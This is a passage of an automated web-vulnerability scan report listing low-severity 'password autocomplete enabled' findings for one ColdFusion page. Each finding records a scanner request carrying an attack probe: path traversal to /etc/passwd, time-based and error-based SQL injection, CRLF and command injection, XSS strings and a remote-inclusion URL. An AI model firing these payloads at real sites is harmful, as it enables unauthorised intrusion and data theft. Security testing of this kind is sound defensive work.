...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.160. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:02 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.161. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000039)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.162. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.163. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=index.cfm%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.164. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.165. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.166. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.167. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.168. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.169. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=body%7Bx:expression(netsparker(0x000033))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000033))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.170. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.171. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.172. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.173. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.174. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00002A))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00002a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.175. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.176. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
